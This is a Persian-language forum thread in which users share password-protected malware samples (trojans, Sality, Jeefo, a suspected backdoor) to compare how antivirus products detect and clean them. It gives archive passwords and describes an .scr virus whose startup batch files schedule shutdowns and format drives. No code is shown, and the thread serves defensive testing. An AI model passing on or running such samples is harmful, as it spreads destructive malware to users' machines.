برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدلینک دانلود:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد:dr


مرسی دوست عزیز. نمونه ی جالبی بود.

دیتابیس کسپرسکی تشخیص نداد.
هوش مصنوعی کسپرسکی تشخیص نداد.
اما Application Control اصلا نزاشت اجرا بشه. :46:

برنده: کسپرسکی

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

لطفا کسی بدون اینکه ندونسته تنظیمات کسپرسکی چی بوده و چطوری میشه اجرا نکنه.

یا اینکه میتونه فقط فایل آلوده را از داخل فایل های فشرده شده ی دیگه مانند Zip, ISO و یا bin پاک کنه و به فایل های سالم کاری نداشته باشه؟

البته درسته که پست شما رو نقل قول کردم اما این صحبت من در مورد همه آنتی ویروسهاست. اگر آنتی ویروسی نتونه یک فایل فشرده شده ساده رو که فقط 1 فایل آلوده توشه از وجود آلودگی پاک کنه, آیا فکر نمیکنید زمانی که سیستم شما به ویروسها و کرمهای خطرناکی آلوده شد خیلی دیر شده باشه و همه فایل های مهمتون رو از دست بدید و در آخر هم با نصب دوباره ویندوز همان آنتی ویروس قبلی را نصب کنید. سلام.
اول تشکر میکنم از توجهتون و فایل تستی که قرار دادید.
ماشااله انقدر استقبال زیاده که این تاپیک هر روز 10 صفحه ای جلو میره!

ببینید ویروس یا هر فایلی که فشرده میشه بایتهاش دچار یک سری تغییرات میشن(بواسطه الگوریتم فشرده سازی)
بنابراین اون ویروس در قالب یک فایل فشرده توانایی انجام کاری رو نداره.
فقط برنامه میزبان میتونه فایل فشرده رو به ما نمایش بده و اون رو استخراج کنه.(مثل WinZip و Winrar و ...)

در رابطه با دو فایلی که شما آپلود کردید چند نکته وجود داره:
همونطور که گفتم آنتی ویروس نورتون میتونه یک فایل ویروسی رو از درون فایل ZIP شده پا کنه.
در مورد بقیه فرمتها مثل RAR فکر نمیکنم این کارو انجام بده.
البته هر آنتی ویروسی به راحتی میتونه این فایلها رو موشکافی کنه و حتی ویروسهای موجود در اونها رو پاک کنه.
چون مآژولهای Winrar و 7zip و . . . به طور رایگان عرضه میشن و قابل استفاده هستن.

بنابراین این بر میگرده به سیاست خود شرکتهای امنیتی که چه راهکاری رو در پیش میگیرن.

یک علت سبک و سریع بودن Avira همین مساله میتونه باشه که خودش رو درگیر این ریزه کاریها نکرده و هدف اصلیش شناسایی و حذف ویروسه.

======================
در مورد ویروس Exe شده ای که گذاشتید باید بگم اونم یکجور فشرده سازی یا به عبارت بهتر Embed کردن فایلهای ویروسی در قالب یه فایل اجرایی جدیده.
یعنی فایل ویروسی در یک لایه دیگه قرار داره و بازهم آزادی عمل نداره.

ببینید این نکته مهمیه.نباید اینو با عملکرد ویروسهایی مثل Jeefo و sality اشتباه بگیریم.
ویروسهایی که نام بردم از گروه ویروسهای پلی مورفیک هستن و روی برنامه های اجرایی تغییرات ایجاد میکنن.
این با فشرده سازی و جاسازی کردن تفاوت داره. در واقع قدرت Repair یا Clean یا Disinfect کردن یک آنتی ویروس رو اینجا میشه محک زد.
هفته آینده که وقت بیشتری پیدا کردم در این مورد بیشتر صحبت می کنیم.
موفق باشید.

سلام.
اول تشکر میکنم از توجهتون و فایل تستی که قرار دادید.
ماشااله انقدر استقبال زیاده که این تاپیک هر روز 10 صفحه ای جلو میره!

ببینید ویروس یا هر فایلی ...


مرسی دوست عزیز بابت توضیحات. اما چند نکته ای هست که من خودم شخصا برام اهمیت داره و همین نکات ریز برای من و کسانی که مثل من فکر میکنند میتونهدر انتخاب یک آنتی ویروس مطمئن نقش اساسی داشته باشه.


ببینید ویروس یا هر فایلی که فشرده میشه بایتهاش دچار یک سری تغییرات میشن(بواسطه الگوریتم فشرده سازی)
بنابراین اون ویروس در قالب یک فایل فشرده توانایی انجام کاری رو نداره.ویروس, کرم, تروجان, اکسپلویت, و کلا هر چیزی که به اسم Malware معرفی میشه حتی اگر فشرده هم نشده باشه به خودی خودی هیچ ضرری نداره. زمانی اینها میتونند مضر باشند که علتی برای اجرا شدنشون پیدا بشه. حالا این علت یا میتونه توسط نرم افزار های جانبی انجام بشه, یا میتونه توسط سهل انگاری و بی دقتی کاربر باشه, یا میتونه از فعال بودن Autorun برای درایوهای CD/DVD یا USB ها باشه و یا هر چیز دیگه ای که فکرش را بکنید.

اگر یک فایل exe از یک تروجان را داخل فولدر System32 بصورت دستی کپی کنید بهتون قول میدم که تا زمانی که شما خودتون ویندوزتون رو فرمت نکردید اون تروجان هیچ ضرری رو نمیتونه به سیستم شما برسونه.


بنابراین این بر میگرده به سیاست خود شرکتهای امنیتی که چه راهکاری رو در پیش میگیرن.

یک علت سبک و سریع بودن Avira همین مساله میتونه باشه که خودش رو درگیر این ریزه کاریها نکرده و هدف اصلیش شناسایی و حذف ویروسه.به نظر من اسم این کار رو نمیشه سیاست گذاشت. بهتره بگیم کم کاری, بی توجهی, مصرف نکردن هزینه بیشتر برای بهبود بهتر برنامه. اصلا در کل بهتره اینطوری بگم که به ما چه که شرکت فلانی چه سیاستی رو به قول شما پیش گرفته, نیاز من اینه که بتونه کاری رو که نیاز امروز کاربران هست رو تامین کنه نه اینکه چند سال دیگه بیاد و امکانی رو که رقبای خودش چند سال قبل اون رو ارائه کردن بیرون بده.

بطور مثال الان اکثر آنتی ویروسها Behavior Blocker رو جزوی از سیستم دفاعی یک آنتی ویروس کردند و اگر آنتی ویروسی الان هوش مصنوعی و Behavior Blocker رو نداشته باشه نمیتونه با آلودگی های 0day و تنها با داشتن signatures مقابله کنه. فرض کن اگر نورتون Sonar رو نداشت یا Kaspersky سیستم دفاعی HIPS و Behavior Blocker رو نداشت چه افتضاحی رو به بار میاوردن.

الان هم کاربران ناد32 در انجمن رسمی ناد32 تقاضای Behavior Blocker کردند اما ناد32 جواب داده حالا حالاها منتظر همچین چیزی نباشید چون نسخه ی آینده خودم رو قرار با Parental Control بیرون بدم.

منظور من از اسم بردن از ناد32 فقط بعنوان یک مثال بود که این جمله ام رو دوباره تاکید کنم که برای کاربران امروزی که روز به روز به سطح آگاهی شون افزوده میشه و هر روز حرفه تر از دیروز میشند مهم نیست که شرکت فلان آنتی ویروس به چه دلیلی نمیخواد امکانات خودش رو مثل بقیه آنتی ویروسهای رقیب بروز کنه بلکه این نکته براشون مهمه که امروز بهش احتیاج دارند نه فردا.


هدف اصلیش شناسایی و حذف ویروسهاین جمله خیلی جالب بود :31: منظورم حالت شوخی بود عزیز.
خب الان 10 صفحه از این تاپیک برای چی اضافه شده؟ خب برای اینکه بدونیم کدوم آنتی ویروس بهتر میتونه ویروسها رو حذف کنه. :46: نه اینکه پیداشون کنه اما در حذفشون ناموفق باشه.


در مورد ویروس Exe شده ای که گذاشتید باید بگم اونم یکجور فشرده سازی یا به عبارت بهتر Embed کردن فایلهای ویروسی در قالب یه فایل اجرایی جدیده.
یعنی فایل ویروسی در یک لایه دیگه قرار داره و بازهم آزادی عمل نداره.دوست عزیز کلا exe. خودش یک نوع فایل فشرده حساب میشه.

شما یک فایل exe را میتونید با دابل کلیک اجرا کنید.
شما میتونید یک فایل exe را که داخل rar قرار داره توسط وین رار باز کنید و باز با دابل کلیک اون رو اجرا کنید.

در هر دو صورت تا زمانی که فایل exe اجرا نشه خطری سیستم رو تهدید نمیکنه. مگر اینکه توسط عوامل دیگه ای مانند کرمهای Autorun اجرا بشند.


این با فشرده سازی و جاسازی کردن تفاوت داره. در واقع قدرت Repair یا Clean یا Disinfect کردن یک آنتی ویروس رو اینجا میشه محک زد.بله کسی هم منکر این نیست و اگر پست های قبلی منو بخونی متوجه میشی که وقتی فهمیدم drhaniball عزیز یک نمونه واقعی گذاشته خیلی هم خوشحال شدم و ازش هم تشکر کردم. نمونه های گذاشته شده توسط من حتی اگر نشه با یک نمونه واقعی اون رو مشابه دونست اما همینکه یک آنتی ویروس بتونه از داخل فایل های فشرده شده مهم و بقول شما با ماژول مجانی پاک بکنه اهمیت داره.

یک نمونه خیلی ساده اش این میتونه باشه که شما یک فایل 3 گیگابایتی را از جایی دانلود کردید و نمیدونید که داخلش یک فایل آلوده وجود داره. آنتی ویروس شماره 1 بعد از اسکن اتوماتیک که هر هفته یا هر ماه تنظیم کردید که کامپیوتر شما رو اسکن بکنه کل فایل 3 گیگی رو پاک میکنه چون نتونسته فقط خود فایل آلوده رو بکشه بیرون.

حالا فردی مثل من, کسانی که خانوادگی از یک کامپیوتر استفاده میکنند, دوست دختر های نازنینتون که از کامپیوتر زیاد سرشون نمیشه, پد و مادر هایی که از کامپیوتر فقط برای خوندن اخبار استفاده میکنند و با دیدن وب کم برق از چشماشون میپره , ادارات و شرکت های بزرگ تجاری و یا هر قشری که فکرش رو بکنی ممکنه پشت اون کامپیوتر بشینه و ازش استفاده کنه و به همین دلیل همچین کامپیوتر هایی به اسکن اتوماتیک هر چند وقت یکبار نیاز دارند چون کسی نیست که مدام نظاره گر این باشه که آنتی ویروس آپدیت شده یانه, اسکن شده یا نه...اصلا مگه در اون کامپیوتر ها فقط یک برنامه وجود داره و اون هم آتی ویروسه؟ نه دوست عزیز پاک شدن فایل های آلوده در اسکن ها اتوماتیک بسیار خطرناکه و گاهی افراد فایل های بسیار مهمشون رو از دست میدند و چون قرنتظینه آنتی ویروسها معلوم نیست بر روی چه حجمی تنظیم شده باشه بنابراین نمیشه به قرنطینه هم زیاد اعتماد کرد.

من خودم شخصا ایمیج هایی رو دارم که از حجم یک سی دی معمولی 700 مگ شروع میشه تا 6 گیگ. در حالی که حجم محدود شده ی هیچ آنتی ویروسی بصورت پیش فرض از 500 مگابایت بیشتر نیست و بعد اتوماتیک پاک میشه. یعنی اگر در یک آنتی ویروس حجم قرنطینه و نگاه داشتن یک کپی از فایل های پاک شدش روی 500 مگابایت باشه, این آنتی ویروس تا زمانی که حجم 500 مگ پر نشده بک آپ ها رو پاک نمیکنه.

از این گذشته به غیر از محدودیت حجمی محدودیت زمانی هم وجود داره. بعضی آتی ویروسها فایل های بک آپ را تا 15 روز و بعضی هم تا 30 روز نگه میدارند.

اگر بخوام همینطوری ادامه بدم ده ها دلیل دیگه میتونم بیارم که به نحوی اگر فایل های سالم همراه با فایل آلوده پاک بشند نه تنها اون آنتی ویروس کمکی رو نتونسته انجام بده بلکه باعث ضرر و زیانهای مادی و حتی معنوی به افراد میشه .

به نظر من پاک کردن فایل های آلوده از داخل فایل های سالم چه فشرده شده و چه معمولی حتی اگر ضرری هم داشته باشه باز صدها برایر بهتر از پاک کردن کل فایل سالم به خاطر 1 فایل آلوده میتونه باشه. جالب میشه اگر اون 1 فایل آلوده هم False Positive باشه :31:

هر کسی استفاده ای داری اما من خودم هیچ وقت از آنتی ویروسی که این امکان رو نداشته باشه استفاده نمیکنم چون تجربه اش رو داشتم و بدجوری هم ضربه خوردم. به دوستان و آشنایانی هم که در اطرافم هستند هیچ وقت پیشنهاد همچین آنتی ویروسهایی رو نمیدم. به هر حال هر کسی نظری داره و هر کسی هم نیازی.

موفق باشید. :11:

نوع مخرب:Backdoor ( احتمالا )

این بکدور احتمالا روی آنتی ویروس کسپرسکی سوار میشه و کارش رو انجام میده. نمیدونم دقیقا کارش چیه اما خیلی مشکوک بود.( یکم هم شک دارم اصلا مخرب نباشه ! :31: )

من ازش یه عکس گرفتم تا دوستان ظاهرش رو هم ببینند. خود کسپرسکی شناسایی نکرده.

ظاهر جالبی داره :)

هم این به احتمال بکدور کسپرسکی و سرور دانلود رو به خاطر دوست عزیزم دریملند گذاشتم :) تا هم نگه لینک مستقیم چرا نذاشتین و هم کسپرسکی شو یه صفایی بده ;)

ظاهرش به شکل فایل نصب می مونه شکل زیر:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

توتال:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدلینک دانلود:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد:dr

سلام
وقتی خواستم از حالت زیپ خارج کنم نورتون شناختش و حذف کرد
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اینم دو تا تروجان جدید
نتیجه توتال:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
دانلود:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد123

ویروس های تزریق شده هم فردا یا پسفردا دو سه تا دارم ارسال میکنم
سالیتیaa
و jeefo.
نورتون از روی اسکن نمیشناسه

نوع مخرب:Backdoor ( احتمالا )


سلام

جی دیتا در زمان اکسترکت شناخت .


عشق ، هم آمدنی است و هم آموختنی .

سلام

دوستان و اساتید محترم ، میخواستم بدونم که این پاکسازی ها همیشه میتونه اتفاق بیوفته یا اینکه مواردی هم هستند که به شکلی

سیستم رو آلوده میکنند که دیگه آنتی ویروس قادر به پاکسازی نیست یا بهتر عرض کنم که خصلتشون اینه که سیستم رو اینطوری آلوده

کنند.


عشق ، هم آمدنی است و هم آموختنی .

سلام

دوستان و اساتید محترم ، میخواستم بدونم که این پاکسازی ها همیشه میتونه اتفاق بیوفته یا اینکه مواردی هم هستند که به شکلی

سیستم رو آلوده میکنند که دیگه آنتی ویروس قادر به پاکسازی نیست یا بهتر عرض کنم که خصلتشون اینه که سیستم رو اینطوری آلوده

کنند.


عشق ، هم آمدنی است و هم آموختنی .

این هم ویروس سالیتی
که قولش رو داده بودم
و چند تا ویروس خطرناک دیگه
دانلود:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



از اونجایی که ویروس خیلی خطرناکه و انتی ویروس رو خاموش میکنه و..




هرکس خواست پسورد pm میشود

این هم ویروس سالیتی
که قولش رو داده بودم
و چند تا ویروس خطرناک دیگه
دانلود:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



از اونجایی که ویروس خیلی خطرناکه و انتی ویروس رو خاموش میکنه و..




هرکس خواست پسورد pm میشود


برا من بفرست

برا من بفرست

فرستادم.
.........

این هم ویروس سالیتی
که قولش رو داده بودم
و چند تا ویروس خطرناک دیگه
دانلود:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



از اونجایی که ویروس خیلی خطرناکه و انتی ویروس رو خاموش میکنه و..




هرکس خواست پسورد pm میشود



برا من بفرست

آویرا فایل winamp آلوده را ریپیر کرد salitykiller هم نشناخت (فایل آلودست یا تمیزه؟)بقیه را پاک کرد.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

لینک salitykiller تو توتال

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

لینک فایل ریپیر شده

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

مرسی دوست عزیز. نمونه ی جالبی بود.

دیتابیس کسپرسکی تشخیص نداد.
هوش مصنوعی کسپرسکی تشخیص نداد.
اما Application Control اصلا نزاشت اجرا بشه. :46:

برنده: کسپرسکی

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

لطفا کسی بدون اینکه ندونسته تنظیمات کسپرسکی چی بوده و چطوری میشه اجرا نکنه.


مگه میشه ویروسی از دست اپ کنترل کسپر رد بشه :46: فکر کنم احتمال آلوده شدن با تنظیم کامل که چند دقیقه بیشتر طول نمیکشه 0 درصد باشه :10:

مگه میشه ویروسی از دست اپ کنترل کسپر رد بشه :46: فکر کنم احتمال آلوده شدن با تنظیم کامل که چند دقیقه بیشتر طول نمیکشه 0 درصد باشه :10:

دقیقا دکتر جان, چون تا حالا من هیچ ویروس یا تروجانی رو ندیدم که امضای دیجیتالی داشته باشه. اگر پیدا کردی به ما هم خبر بده :46:

مخربی هم که امضای دیجیتالی نداشته باشه جاش اتوماتیک توی untrusted هست. :10:

من توی برنامه های امنیتی یکی KIS و یکی هم CIS رو دیدم که بدون نصب هیچ نرم افزار امنیتی دیگه میتونند 100 درصد آلودگی را بلاک کنند حتی اگر در دیتابیسشون نباشه. CIS 4.1 غولیه برای خودش.

---------- Post added at 12:56 PM ---------- Previous post was at 12:54 PM ----------


آویرا فایل winamp آلوده را ریپیر کرد salitykiller هم نشناخت (فایل آلودست یا تمیزه؟)بقیه را پاک کرد.



لینک salitykiller تو توتال

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدلینک فایل ریپیر شده

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

آفرین به اویرا توی این یکی موفق بود :31:
مرسی که نتیجه رو گفتی :10:

این هم ویروس سالیتی
که قولش رو داده بودم
و چند تا ویروس خطرناک دیگه
دانلود:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



از اونجایی که ویروس خیلی خطرناکه و انتی ویروس رو خاموش میکنه و..




هرکس خواست پسورد pm میشود

نورتون هنگام Extract کردن تمام ویروس ها رو حذف کرد
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
فایل SalityKiller.exe هم بنظرم ویروسی نیست
اینم نتیجه حجم فایل winamp501_full.exe بعد از ریپیر کردن
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دقیقا دکتر جان, چون تا حالا من هیچ ویروس یا تروجانی رو ندیدم که امضای دیجیتالی داشته باشه. اگر پیدا کردی به ما هم خبر بده
مخربی هم که امضای دیجیتالی نداشته باشه جاش اتوماتیک توی untrusted هست.
من توی برنامه های امنیتی یکی KIS و یکی هم CIS رو دیدم که بدون نصب هیچ نرم افزار امنیتی دیگه میتونند 100 درصد آلودگی را بلاک کنند حتی اگر در دیتابیسشون نباشه. CIS 4.1 غولیه برای خودش.


ویروس دیده بودم فرمتش exe نبود اگه شد اونو میذارم تا اپ کنرتل کسپر تست بشه. یه چیز تو مایه های civ یا همچین چیزی خاطرم نمیاد.

یه سری مخرب اتوران هم هست که فرمتش xlm هست. این رو توی یه فلش پیداکرده بودم و الان این رو هم ندارم.و احتمال میدم خود این xlm کمکی ویروس اصلی باشه نه خود مخرب مثل اینکه بگیم inf یه اتوران.

اگه بشه یه سری ویروس که فرمت exe نداشته باشه با اپ کنرتل کسپر تست بشه عالی میشه.

به نظرم به غیر trusted کسپر بن بشه حرفی برای گفتن باقی نمی مونه ولی کسی که این کار رو بکنه باید چند مین سر اپ ها وقت بذاره و یکم هم اطلاعات داشته باشه اما به امنیتی 99.9999999 درصدی که میده می ارزه. یه خورده درصد رو کم کردم به خاطر این چند مورد بالایی [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

عجب تصادفی !!!

ava uk جان پیداش کردم چه ویروس حلال زاده ای بوده [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


این ویروس i lov u saghar با فرمت scr که توی پک wordship عزیز هست نمونه برای تست اپ کنرتل کسپره که گفتم.

این کارش خیلی سادست این ویروس رو قبلا از خود ایشون کرفته بودم اون موقع کسپر شناسایی نمیکرد و به 1000 زحمت برای کسپر ارسال کردم.[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بعد از اجرا 2 تا دستور cmd توی استارت اپ می زاره. که یکیش تایمر برای خاموش شدن سیستم هست و یکی دیگه فرمت درایو ها به غیر از ویندوز.

جالبه اگه این ویروس روی سیستم نصب بشه با خود کسپرسکی که الان این ویروس رو شناسایی می کنه نمیشه پاک سازی کرد. 2 فایل bat که این 2 تا دستور رو توی فولدر استارت اپ گذاشتند به اسم eset antivirus.bat و nod32.bat این خراب کاری رو می کنند.

حالا بر فرض مثال اگه این ویروس رو کسپر شناسایی نکنه ببینیم میشه با اپ کنترل کسپر بن بمونه یا نه. نتیجه خیلی باید جالب باشه ولی مواظب باش اگه خواستی تست کنی.

این ویروس حدود 2 ماه پیش وارد دیتا بیس کسپر شده.[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

عجب تصادفی !!!

ava uk جان پیداش کردم چه ویروس حلال زاده ای بوده [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


این ویروس i lov u saghar با فرمت scr که توی پک wordship عزیز هست نمونه برای تست اپ کنرتل کسپره که گفتم.

این کارش خیلی سادست این ویروس رو قبلا از خود ایشون کرفته بودم اون موقع کسپر شناسایی نمیکرد و به 1000 زحمت برای کسپر ارسال کردم.[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بعد از اجرا 2 تا دستور cmd توی استارت اپ می زاره. که یکیش تایمر برای خاموش شدن سیستم هست و یکی دیگه فرمت درایو ها به غیر از ویندوز.

جالبه اگه این ویروس روی سیستم نصب بشه با خود کسپرسکی که الان این ویروس رو شناسایی می کنه نمیشه پاک سازی کرد. 2 فایل bat که این 2 تا دستور رو توی فولدر استارت اپ گذاشتند به اسم eset antivirus.bat و nod32.bat این خراب کاری رو می کنند.

حالا بر فرض مثال اگه این ویروس رو کسپر شناسایی نکنه ببینیم میشه با اپ کنترل کسپر بن بمونه یا نه. نتیجه خیلی باید جالب باشه ولی مواظب باش اگه خواستی تست کنی.

این ویروس حدود 2 ماه پیش وارد دیتا بیس کسپر شده.[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام دکتر جان.
نمونه ی جالب و متنوعیه. خوشمان آمد :31: ویروس بده بابا :3:

راستش من فکر نمیکنم Application Control در اینجا بتونه در مقابل Malware هایی که فرمتشون EXE نیست واکنشی از خودش نشون بده چون App control بیشتر برای فایل های سایگن نشده و با فورمت exe. میتونه این کار رو انجام بده.

البته اگر در یک سیستم 32 بیتی این مخرب زیر نظر Safe run اجرا بشه فکر میکنم که اتفاقی در سیستم نیوفته اما چون سیستم من 64 بیتی است و اینجا فقط میخوایم کسپرسکی را آزمایش کنیم نه چیز دیگری رو به همین دلیل من نمیتونم اون رو در این سیستم زیر نظر Sandbox خود کسپرسکی اجرا کنم. هر چند که خودم Sandbox جدا استفاده میکنم اما ما میخوایم کسپرسکی با تمام امکاناتی که داره تست بشه نه برنامه های جانبیه دیگر.

البته من میتونم این ویروس رو بعدا سر فرصت در بعد از نصب VMware و نصب کسپرسکی در اون آزمایشش کنم اما فعلا فرصت این کار رو ندارم. به همین دلیل این مورد رو که بسیار نادره در انجمن رسمی کسپرسکی مطرح کردم. باید منتظر باشیم ببینیم که تیم کسپرسکی چه جوابی دارند بدند. اگر جوابی از اونها دریافت نشد بعدا در VMware تستش میکنم. :46:

این هم ویروس سالیتی
که قولش رو داده بودم
و چند تا ویروس خطرناک دیگه
دانلود:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



از اونجایی که ویروس خیلی خطرناکه و انتی ویروس رو خاموش میکنه و..




هرکس خواست پسورد pm میشود


آقا اگه لطف کنید و برای من هم پسورد رو بفرستید ممنون میشم. میخوام با کسپر و نو32 و نورتون در حالات مختلف تست کنم.:5:

سلام دکتر جان.
نمونه ی جالب و متنوعیه. خوشمان آمد :31: ویروس بده بابا :3:
راستش من فکر نمیکنم Application Control در اینجا بتونه در مقابل Malware هایی که فرمتشون EXE نیست واکنشی از خودش نشون بده چون App control بیشتر برای فایل های سایگن نشده و با فورمت exe. میتونه این کار رو انجام بده..........


اینم اضافه کنم یک قسمتی از این فایل scr رو کسپر میتونست با behavior blocker بلوک کنه اما اصل کار اجرا میشد.پس میشه گفت درون این فایل بازم یک سری exe وجود داشته باشه یا یه جور دیگه فکر کنیم behavior blocker می تونه غیر exe هارو تشخیص بده.
من فکر کنم این نکته(غیره exe ها) که حرفشو با هم زدیم خیلی جالب و جدید باشه.بازم تبریک میگم بحث های خیلی خوبی اینجا شده از اولین صفحه مطلب هست تا اینجا.[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام
دوستان و اساتید محترم ، میخواستم بدونم که این پاکسازی ها همیشه میتونه اتفاق بیوفته یا اینکه مواردی هم هستند که به شکلی
سیستم رو آلوده میکنند که دیگه آنتی ویروس قادر به پاکسازی نیست یا بهتر عرض کنم که خصلتشون اینه که سیستم رو اینطوری آلوده
کنند.


پاکسازی همیشه ثابته وقتی آنتی ویروس شما بتونه تشخیص بده موردی باقی نمی مونه. قبلا گفته شده بود تا وقتی که روی خود مخرب دبل کلیک نکنید هیچ مشکلی بوجود نمیاد. پس اصلا آلودگی ایجاد نمیشه که آنتی ویروس بتونه یا نتونه پاکسازی کنه. فایل اصلی ویروس هم که همیشه درون یک rar هست و هیچ خطری نداره.

اون مشکلی که برای یکی از دوستان اتفاق افتاد و گفته بود کسپر نمیتونه پاک کنه برای من هم قبلا این ایراد پیدا شده بود و دلایلش رو هم گفتم احتمالش چی میتونه باشه.[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

مخرب

توتال:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: Dr

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نکته : با اینکه avast5 شناسایی کرده اما جی دیتا شناسایی نکرده. پس موتور جی دیتا avast هست نه avast5 .

مخرب

توتال:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: Dr

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نکته : با اینکه avast5 شناسایی کرده اما جی دیتا شناسایی نکرده. پس موتور جی دیتا avast هست نه avast5 .

نورتون از روی اسکن نشناخت:41:

مخرب

توتال:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: Dr

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نکته : با اینکه avast5 شناسایی کرده اما جی دیتا شناسایی نکرده. پس موتور جی دیتا avast هست نه avast5 .


كسپر هم از روي اسكن نشناخت براي كسپر ارسال شد

مخرب

توتال:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: Dr

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نکته : با اینکه avast5 شناسایی کرده اما جی دیتا شناسایی نکرده. پس موتور جی دیتا avast هست نه avast5 .


کسپر 2011 شناختش

2010/06/26 12:40:12 ب.ظ Detected: Trojan.Win32.Monder.dilr C:\documents and settings\mostafa\Desktop\ef49bb10c3164c79bdde\p30w orld\tr.rar/tr.exe

کسپر 2011 شناختش

2010/06/26 12:40:12 ب.ظ Detected: Trojan.Win32.Monder.dilr C:\documents and settings\mostafa\Desktop\ef49bb10c3164c79bdde\p30w orld\tr.rar/tr.exe
دوست عزیز به دیتابیس کسپر اضافه شده :10:
اینم نتیجه توتال

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دوست عزیز به دیتابیس کسپر اضافه شده
تمام ورژن های کسپر میشناسن:10:

.....
من هم از avira چینج کردم به kis 2011 .

اینم اضافه کنم یک قسمتی از این فایل scr رو کسپر میتونست با behavior blocker بلوک کنه اما اصل کار اجرا میشد.پس میشه گفت درون این فایل بازم یک سری exe وجود داشته باشه یا یه جور دیگه فکر کنیم behavior blocker می تونه غیر exe هارو تشخیص بده.
من فکر کنم این نکته(غیره exe ها) که حرفشو با هم زدیم خیلی جالب و جدید باشه.بازم تبریک میگم بحث های خیلی خوبی اینجا شده از اولین صفحه مطلب هست تا اینجا.[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

خب دکتر جان, بالاخره یکی از مدیران انجمن کسپرسکی اومد و جوابگو شدو توضیحات لازم رو دادم.

توضیحات از زبان Lucian Bara مدیر انجمن کسپرسکی:
Applicatio Control در کل هسته اصلی را آنالیز و بررسی میکند نه فقط exe. ها را. به همیل دلیل یک فایل exe که نامش عوض شده باشه همچنان اسکن خواهد شد. در ادامه Application Control نمیتونه در مقابل فایل های inf. و یا xml. از شما محافظت بکنه به خاطر اینکه اینها فایل های اجرایی نیستند. یک فایل text میتونه اجزایی از یک مخربی باشه که قادر به اجرا شدن هست. اجازه بده اینطوری بگیم که مثلا یک فایل inf. قسمتی برای اجرا کردن exe. از طریق تنظیمات اجرای اتوماتیک ویندوز است اما فایل اجرایی exe تنها فایلی است که میتونه کاری بکنه / سیستم را آلوده بکنه. inf. و xml. نمیتونند کاری بکنند و امکان این وجود نداره که بشه اینها رو کنترل کرد چون اینها نمیتونند بعنوان یک پروسه اجرا بشند و کاری را انجام دهند.

یک فایل scr. یک فایل اجرایی هست , و اگر اجرا بشه درست مانند یک فایل اجرایی exe. در Application Control باهاش برخورد میشه.

خب تا اینجا توضیحاتی بود که Lucian داد. اگر در ترجمه بعضی جاها رو تغییر دادم به خاطر این بود که با فارسی جور در نمیومد و برای فهم موضوع باید تغییر میکردند. :31:

این هم ویروس سالیتی
که قولش رو داده بودم
و چند تا ویروس خطرناک دیگه
دانلود:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



از اونجایی که ویروس خیلی خطرناکه و انتی ویروس رو خاموش میکنه و..




هرکس خواست پسورد pm میشود


برا من هم بفرست
ممنون

تست پست 383
norton
avira
malwarebytes

هیچ کدوم با اسکن شناسایی نکردن
اجراش دیگه نکردم

خب دکتر جان, بالاخره یکی از مدیران انجمن کسپرسکی اومد و جوابگو شدو توضیحات لازم رو دادم.


چیزی که من متوجه شدم این بود که scr هم یک فایل اجرایی هست. جالب بود.

